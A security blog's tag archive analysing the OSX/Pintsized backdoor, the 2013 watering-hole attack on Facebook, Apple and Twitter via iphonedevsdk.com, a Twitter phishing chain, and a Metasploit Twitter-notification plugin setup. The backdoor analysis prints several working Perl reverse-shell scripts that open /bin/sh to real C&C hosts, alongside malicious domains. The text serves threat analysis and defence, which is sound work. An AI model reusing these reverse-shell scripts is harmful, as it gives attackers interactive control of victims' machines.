Tag Archives: Twitter

OSX/Pintsized Backdoor Additional Details

In complement to my blog post regarding Facebook, Twitter and Apple victims of a watering hole attacks, you will find here under some additional informations regarding OSX/Pintsized, the backdoor used to in these attacks.

OSX/Pintsized backdoor was initially described by Intego, the 19 February, with some details. At the time of Intego post, all of the C&C components were sinkholed to Shadowserver. The backdoor was composed of clear text reverse shell perl scripts, executed a regular interval, and by a forked version of OpenSSH named “cupsd“. A RSA key was embedded in the forked OpenSSH, reported domain name of C&C was “corp-aapl.com” and reported file names were:

  • com.apple.cocoa.plist
  • cupsd (Mach-O binary)
  • com.apple.cupsd.plist
  • com.apple.cups.plist
  • com.apple.env.plist

F-Secure also reported, the 19 February, some additional C&C servers “cloudbox-storage.com” and “digitalinsight-ltd.com“. Symantec reported some additional details on the C&C domain names “cache.cloudbox-storage.com“, “img.digitalinsight-ltd.com” and “pop.digitalinsight-ltd.com“, and also reported the storage location of the forked version of OpenSSH “/Users/[USER NAME]/.cups/cupsd“.

By doing an analysis of OSX/Pintsized I can provide the following additional informations:

All files, targeting OSX, were controlled by launchd daemon through launchd.plist configuration files. Here under the list of all known launchd configuration files.

7fe4149b82516ae43938de6b8316ed84

First seen: 2013-02-19 / Label: com.apple.cupsd / RunAtLoad: true / StartInterval: 900 / C&C: corp-aapl.com:8443

Execute “/Users/[USER NAME]/.cups/cupsd -z corp-aapl.com -P 8443

2e35b9a683ccc2408fef5ca575abf0e6

First seen: 2013-02-19 / Label: com.apple.cupsd / RunAtLoad: true / StartInterval: 900 / C&C: corp-aapl.com:8443

Execute “/Users/[USER NAME]/.cups/cupsd -z corp-aapl.com -P 8443

27f241c64303e4e2d1d94d3143a48eb9

First seen: 2013-02-19 / Label: com.apple.istore / RunAtLoad: true / StartInterval: 900 / C&C: cache.cloudbox-storage.com:443

Execute the following script with /usr/bin/perl

use Socket;
$p=sockaddr_in(443,inet_aton("cache.cloudbox-storage.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
2b9b84f0612d6f9d7efb705dd7522f83

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: cache.cloudbox-storage.com:443

Execute the following script with /usr/bin/perl

use Socket;

<em id="__mceDel">$p=sockaddr_in(443,inet_aton("cache.cloudbox-storage.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
34cee92669e0c60a9dbafae7319f49db

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: img.digitalinsight-ltd.com:443

Execute the following script with /usr/bin/perl


use Socket;
$p=sockaddr_in(443,inet_aton("img.digitalinsight-ltd.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");
d3f151b246deb74890c612606c6ad044

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: pop.digitalinsight-ltd.com:443

Execute the following script with /usr/bin/perl


use Socket;
$h="pop.digitalinsight-ltd.com ";
$h=~s/\s+$//;
$p=sockaddr_in(443 ,inet_aton($h));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");

f419dfb35a0d220c4c53c4a087c91d5e

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 900 / C&C: pop.digitalinsight-ltd.com:443

Execute the following script with /usr/bin/perl


use Socket;
$p=sockaddr_in(443,inet_aton("pop.digitalinsight-ltd.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");

59424d4a567ae809f96afc56d22892b2

First seen: 2013-02-19 / Label: com.apple.env / RunAtLoad: true / StartInterval: 999 / C&C: img.digitalinsight-ltd.com:443

Execute the following script with /usr/bin/perl


use Socket;
$p=sockaddr_in(443,inet_aton("img.digitalinsight-ltd.com"));
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
connect(S,$p);
open(STDIN,">&S");
open(STDOUT,">&S");
open(STDERR,">&S");
exec("/bin/sh -i");

Here under all binary files, aka “/Users/[USER NAME]/.cups/cupsd” or “/usr/sbin/muxd“.

0ec55685affc322a5d7be2e9ca1f9cbf

First seen: 2013-01-31 / CPU Architecture: 64 bit

Fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string. 2048 bit embedded private key with associated public key.

3a861b8526e397b3684a99f363ec145b

First seen: 2013-02-20 / CPU Architecture: 64 bit

Fork of OpenSSH_6.0p1 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string. 2048 bit embedded private key with associated public key.

Here under an additional binary caught when Microsoft also pointed the fact that they were victim of this campaign.

1582d68144de2808b518934f0a02bfd6

First seen: 2013-01-22 / Internal name: javacpl.exe

One additional file who was reported linked to the campaign:

622fc8b7daf425aed7f9ffa97e30c611

First seen: 2013-01-04 / Type: Java serialized data

If you take a look at all the domain names sinkholed to Shadowserver, you will see additional domain names.

img

Domain name: corp-appl.com – Creation Date: 05-mar-2012

Domain name: cloudbox-storage.com – Creation Date: 07-dec-2012 – Sub-domains: cache.cloudbox-storage.com

Domain name: digitalinsight-ltd.com – Creation Date: 22-mar-2012 – Sub-domains: ads.digitalinsight-ltd.com, img.digitalinsight-ltd.com, www.digitalinsight-ltd.com and pop.digitalinsight-ltd.com

Domain name: clust12-akmai.net – Creation Date: 06-jun-2012 – Sub-domains:  fb.clust12-akmai.net and fbu.clust12-akmai.net

Domain name: jdk-update.com – Creation Date: 31-oct-2012 – Sub-domains:  ww1.jdk-update.com and www.jdk-update.com

Domain name: fbcbn.net – Creation Date: 09-oct-2012 – Sub-domains:  ak.fbcbn.net and static.ak.fbcbn.net

Facebook, Apple & Twitter Watering Hole Attack Additional Informations

Update: Some worrying information’s at the bottom of the post.

As reported by Ars Technica, the 15th February, Facebook was victim of a watering hole attack, involving a “popular mobile developer Web forum“. The attack was using a Java 0day that has been urgently patched, in Oracle Java CPU of first February, by version 7 update 11 and version 6 update 39.

Ars Technica also pointed that the attack had occur during the same timeframe as the hack that exposed cryptographically hashed passwords at Twitter. Also Twitter was encouraging, the first February, users to disable Java in their browsers. 250 000 user accounts was compromised during the Twitter breach.

Four days after the news on Facebook, the 19 February, Reuters also mentioned Apple as a victim of the Oracle Java 0day. The same “popular mobile developer Web forum” was mentioned, but with the precision that this website is a “popular iPhone mobile developer Web forum”. People briefed on the case said that hundreds of companies were affected by this Java 0day, including defense contractors.

Another interesting fact is that Apple had blacklist Java Web plug-in, a second time in a month, the 31 January, through an update to Xprotect, the Mac OS X “anti-malware” system. Surely a reaction the breach reported in the press 19 days later.

Today, Ars Technica released the name of the “popular iPhone mobile developer Web forum”, aka www.iphonedevsdk.com. Now we can gather some information’s related to this watering hole attack.

On urlQuery we can find an interesting submission, the 23 January, who reveal that some Java code was involved during the visit of the web site.

deployJavaPlugin

On JSUNPACK we can find another interesting submission, the 22 January, related to the www.iphonedevsdk.com. This submission reveals another website who is min.liveanalytics.org with URL “min.liveanalytics.org/cache.js?1358893681579“. The “cache.js” JavaScript was no more present at this date.

liveanalytics.org domain name was created the 8 December October 2012, through Public Domain Registry registrar. All contact information’s are hidden behind PrivacyProtect.org. Privacy Protection ensures that private information of domain owners are not published by replacing all the publicly visible contact details with alternate contact information.

But going back on the first urlQuery submission, we can see that www.iphonedevsdk.com website was doing three requests to min.liveanalytics.org website.

First call was to “/cache.js?1358897354865” JavaScript with a date of “Tue, 22 Jan 2013 23:21:31 GMT“. “1358897354865” return the number of milliseconds since 1970/01/01.

min-liveanalytics-org-cache-js

Second call was to “/jquery.js?ummrznjf” JavaScript with the same date.

jmin-liveanalytics-org-query-js

Third call was to “empty.htm” with additional parameters who are “empty.htm?id=0&ts=X&n=fp&s=Y“. In the following screenshot you will se that X value of ts variable return the number of milliseconds since 1970/01/01. Also in the following screenshot you will see a base64-encoded string:

eyJicm93c2VyIjoiRmlyZWZveCIsInVhIjoiTW96aWxsYSU1Qy81LjAlMjAlMjhXaW5kb3dzJTNCJTIwVSUzQiUyMFdpbmRvd3MlMjBOVCUyMDYuMSUzQiUyMGVuLVVTJTNCJTIwcnYlM0ExLjkuMi4xMyUyOSUyMEdlY2tvJTVDLzIwMTAxMjAzJTIwRmlyZWZveCU1Qy8zLjYuMTMiLCJwcm9kdWN0IjoiR2Vja28iLCJwbHVnaW5zIjp7Ik1vemlsbGElMjBEZWZhdWx0JTIwUGx1Zy1pbiI6eyJpbnN0YWxsZWQiOnRydWUsInZlcnNpb24iOiIxLjAuMC4xNSJ9LCJTaG9ja3dhdmUlMjBGbGFzaCI6eyJpbnN0YWxsZWQiOnRydWUsInZlcnNpb24iOiIxMC4wLjQ1LjIifSwiSmF2YSUyOFRNJTI5JTIwUGxhdGZvcm0lMjBTRSUyMDYlMjBVMjYiOnsiaW5zdGFsbGVkIjp0cnVlLCJ2ZXJzaW9uIjoiNi4wLjI2MC4zIn0sIkphdmElMjBEZXBsb3ltZW50JTIwVG9vbGtpdCUyMDYuMC4yNjAuMyI6eyJpbnN0YWxsZWQiOnRydWUsInZlcnNpb24iOiI2LjAuMjYwLjMifSwiQWRvYmUlMjBBY3JvYmF0Ijp7Imluc3RhbGxlZCI6dHJ1ZSwidmVyc2lvbiI6IjguMC4wLjQ1NiJ9LCJNaWNyb3NvZnQlQUUlMjBEUk0iOnsiaW5zdGFsbGVkIjp0cnVlLCJ2ZXJzaW9uIjoiOS4wLjAuNDUwMyJ9LCJXaW5kb3dzJTIwTWVkaWElMjBQbGF5ZXIlMjBQbHVnLWluJTIwRHluYW1pYyUyMExpbmslMjBMaWJyYXJ5Ijp7Imluc3RhbGxlZCI6dHJ1ZSwidmVyc2lvbiI6IjMuMC4yLjYyOSJ9LCJhY3JvYmF0Ijp7Imluc3RhbGxlZCI6ZmFsc2UsInZlcnNpb24iOm51bGx9LCJmbGFzaCI6eyJpbnN0YWxsZWQiOnRydWUsInZlcnNpb24iOiIxMC4wLjQ1LjIifSwic2hvY2t3YXZlIjp7Imluc3RhbGxlZCI6ZmFsc2UsInZlcnNpb24iOm51bGx9LCJTaWx2ZXJsaWdodCUyMFBsdWctSW4iOnsiaW5zdGFsbGVkIjpmYWxzZSwidmVyc2lvbiI6bnVsbH0sIndtcCI6eyJpbnN0YWxsZWQiOmZhbHNlLCJ2ZXJzaW9uIjpudWxsfSwicmVhbCI6eyJpbnN0YWxsZWQiOmZhbHNlLCJ2ZXJzaW9uIjpudWxsfSwiamF2YSI6eyJpbnN0YWxsZWQiOnRydWUsInZlcnNpb24iOiIxLjYuMF8yNiJ9fX0=

Decoded this value is quiet interesting:

{"browser":"Firefox","ua":"Mozilla%5C/5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%3B%20rv%3A1.9.2.13%29%20Gecko%5C/20101203%20Firefox%5C/3.6.13","product":"Gecko","plugins":{"Mozilla%20Default%20Plug-in":{"installed":true,"version":"1.0.0.15"},"Shockwave%20Flash":{"installed":true,"version":"10.0.45.2"},"Java%28TM%29%20Platform%20SE%206%20U26":{"installed":true,"version":"6.0.260.3"},"Java%20Deployment%20Toolkit%206.0.260.3":{"installed":true,"version":"6.0.260.3"},"Adobe%20Acrobat":{"installed":true,"version":"8.0.0.456"},"Microsoft%AE%20DRM":{"installed":true,"version":"9.0.0.4503"},"Windows%20Media%20Player%20Plug-in%20Dynamic%20Link%20Library":{"installed":true,"version":"3.0.2.629"},"acrobat":{"installed":false,"version":null},"flash":{"installed":true,"version":"10.0.45.2"},"shockwave":{"installed":false,"version":null},"Silverlight%20Plug-In":{"installed":false,"version":null},"wmp":{"installed":false,"version":null},"real":{"installed":false,"version":null},"java":{"installed":true,"version":"1.6.0_26"}}}

min-liveanalytics-org-empty-htm

These kinds of behaviors make me think to a statistic backend like Jsbug, but I don’t have enough information’s to validate my doubts.

By doing some additional researches on urlQuery, regarding min.liveanalytics.org, we can find a submission dating from the 23 January with one screenshot. And by doing also additional researches on urlQuery, regarding www.iphonedevsdk.com, we can observe that min.liveanalytics.org was down the 24 January.

down

Now let try other occurrences for www.iphonedevsdk.com or min.liveanalytics.org in search engines & search engines caches. No luck, Google and his cache are not revealing any information’s, same for Bing and other popular search engines. But WayBack Machine is providing a cached version of www.iphonedevsdk.com for the 15 January, and, and you got it Google Chrome is presenting a nice warning screen regarding min.liveanalytics.org 😉

Capture d’écran 2013-02-20 à 02.47.11

It is confirming us that this website was hosting some malware and that www.iphonedevsdk.com was including JavaScript calls to min.liveanalytics.org the 15 January, date of the Wayback Machine capture. If you take a look at the source code of cached version of www.iphonedevsdk.com you can see this, a nice JavaScript inclusion.

Capture d’écran 2013-02-20 à 00.28.33

So we have a timeline associated with this domain:

  • Domain name was registered the 8 December October with hidden information’s
  • WayBack Machine cached version of 7 December is not infected.
  • WayBack Machine report us that the website was infected the 15 January
  • urlQuery & JSUNPACK report us that the website was up the 22/23 January
  • urlQuery report us that the website was down the 24 January

Another interesting timeline is the Oracle Java patch and life cycle:

  • 11 December 2012: Oracle release, through a CPU, Java SE 7 Update 10 who introduced the levels of security for applet execution.
  • 13 January 2013: Oracle release an alert and update, Java SE 7 Update 11, for a Java 0day able to bypass the security manager.
  • 1 February 2013: Oracle release, through an out-of-band CPU, Java SE 7 Update 13, in order to fix a 0day exploited in the wild.

As you can see, Java SE 7 Update 10, released the 11 December, has introduce the levels of security (“Medium” by default) and bunch of pop-ups, who are warning you about the trust of an applet. Java SE 7 Update 11, released the 13 January, has force the level of security from “Medium” to “High“. With the “High” setting, the user is always prompted before any unsigned Java applet or Java Web Start application is run.

What I can suppose regarding these timelines:

  1. First, the victims of this watering hole campaign didn’t have potentially updated to the latest version.
  2. Second, the victims of this watering hole campaign did have potentially update to JSE 7U11, but have not change the default security level from “Medium” to “High“, despite all the history in Java 0days and advises of security experts.
  3. Third, the victims, have potentially detect the attack when JSE 7U13 was out, because the “High” security level shown them some unusual applet execution on the “popular iPhone mobile developer Web forum”.

Was this campaign a highly targeted attack? I don’t think so, why because Oracle Java has a long history of 0days, and serious companies like Twitter, Facebook and Apple should have disable Java Web Start application for non trusted applets since a while.

Updates

F-Secure has provide in a blog post 2 other domain names involved in the Facebook, Apple and Twitter compromise, this domain name are:

  • cloudbox-storage.com
  • digitalinsight-ltd.com

By investigating on these domain names, I found some worrying information’s. If these information’s are confirmed then the story is complete different and could have a bigger impact.

digitalinsight-ltd.com” domain name was registered the 2012-03-22. By doing some Google dorks we can find these informations:

A post on Fedoraforum.org, dating from 2012-07-14 mentioning this domain name… and a user of the forum wonder why a JavaScript inclusion is done to this domain.

fedora-forum

If you take a look on Wayback Machine, you can find a cached version from 2012-07-12, that makes your Google Chrome screaming….

fedora-forum-alert

And what can we find in the source code of the FedoraForum webpage!!!!! A similar JavaScript inclusion as for www.iphonedevsdk.com also calling a “cache.js” script….

fedora-forum-source-code

We can also found a JSUNPACK submission, dating from 2012-10-22 with same source code….

And we can find some French guys complaining on a forum regarding a JavaScript inclusion to the same domain and script…. the 2012-09-29

Twitter Phishing “Bad blog going around about you, heard or seen it yet?”

I received an unusual private message “Bad blog going around about you, heard or seen it yet?” from one of my followers. Unfortunately my follower fell into a traditional Twitter phishing and his account is surely now compromised.

As you can see in the screenshot the link point to “http://airtar.ru“, a domain name registered since the 2011-10-13 by “[email protected]“. The web site is hosted on 111.123.180.39 in AS4134 ChinaNet GuiZhou Province and the hosting web server redirect you directly on “http://www.twittelr.com/r/“.

HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.6
Date: Sun, 16 Oct 2011 18:48:24 GMT
Content-Type: text/html
Content-Length: 184
Connection: keep-alive
Location: http://www.twittelr.com/r/
P3P: CP="CAO COR CURa ADMa DEVa OUR IND ONL COM DEM PRE"

twittelr.com” domain name is registered since the 2011-09-23 by “yu zhang [email protected]“. The web site is hosted on 220.164.140.252 in AS4134 China Telecom Yunnan Province. Some funny host name are hosted on the same name server than “twittelr.com“, like “xn--fiqs8s13n4ywnyd.net“.

Accessing “http://www.twittelr.com/r/” will redirect you to “http://www.twittelr.com/timed_out_session-/“.

<meta http-equiv="refresh" content="0; URL=/timed_out_session-/">

You will see this phishing page how is quiet good in term of design.

If you provide your login and password the form will post all your informations on “http://www.twittelr.com/app/login2.php” and then redirect you to “http://www.twittelr.com/status/error/” page, but it is to late.

If you access directly on the root directory of “twittelr.com” you will observe an chinese under-construction page 🙂

Twitt Metasploit Plugin on Ubuntu

Twitt Metasploit plugin was developed, in ruby, by Carlos Perez, aka Dark Operator. This plugin permit you to send a Twitter direct message to a configured account when a Metasploit session is created or shutdown. Each message will contain informations about the related session.

Installation :

To install the Twitt Metasploit plugin on Ubuntu 10.04.1 LTS, you first need to update your Ruby Gem with the following commands (Thanks to Carlos, helping me to update gem).

sudo gem install rubygems-update
cd /var/lib/gems/1.8/bin
sudo ./update_rubygems

Then you will be install the needed Ruby Gem needed by the plugin.

sudo gem install twitter

After this, just download the twitt.rb script from Github and install the script in the Metasploit plugin directory, by default “/opt/metasploit3/msf3/plugins/“. Don’t forget to give the right user access to the script and launch Metasploit.

sudo msfconsole

Twitt plugin setup :

To setup the OAuth 1.0a plugin settings you first need a Twitter account, if you don’t have one. After you need to register the Twitt application in the Twitter Developers.

Don’t forget when you fill the form, to determine that the “Application Type” is “Client” and that the “Client” should have a “Read & Write” “Default Access Type“.

Twitter Developers Application Registration
Twitter Developers Application Registration

After the plugin registration on Twitter, you will need different configuration settings :

  • Consumer key for the Metasploit Twitt plugin “twitt_set_consumer_key” command.
  • Consumer secret for the Metasploit Twitt plugin “twitt_set_consumer_secret” command.
  • Access Token (oauth_token) for the Metasploit Twitt plugin “twitt_set_oauth_token” command.
  • Access Token Secret (oauth_token_secret) for the Metasploit Twitt plugin “twitt_set_oauth_token_secret” command.
  • Your Twitter username account for the Metasploit Twitt plugin “twitt_set_user” command.

In Metasploit load the plugin and configure it by the following commands :

Metasploit Twitt plugin loading
Metasploit Twitt plugin loading
Metasploit Twitt plugin configuration
Metasploit Twitt plugin configuration

Just replace all the screenshot configuration settings with your settings 🙂

Then save the configuration with the “twitt_save” command :

Metasploit Twitt configuration saving
Metasploit Twitt configuration saving

As you can see all the configuration settings are save into a “.yaml” file.

If you want to see all the configuration settings from the “.yaml” file just type the “twitt_show_parms” command.

Metasploit Twitt plugin parameters
Metasploit Twitt plugin parameters

Then to start the twit plugin, run “twitt_start” command.

Metasploit Twitt plugin starting
Metasploit Twitt plugin starting

Now each time you will have a new Metasploit session, or if a session is shutdown, a direct message will be send to the configured twitter account. Here under a demonstration video.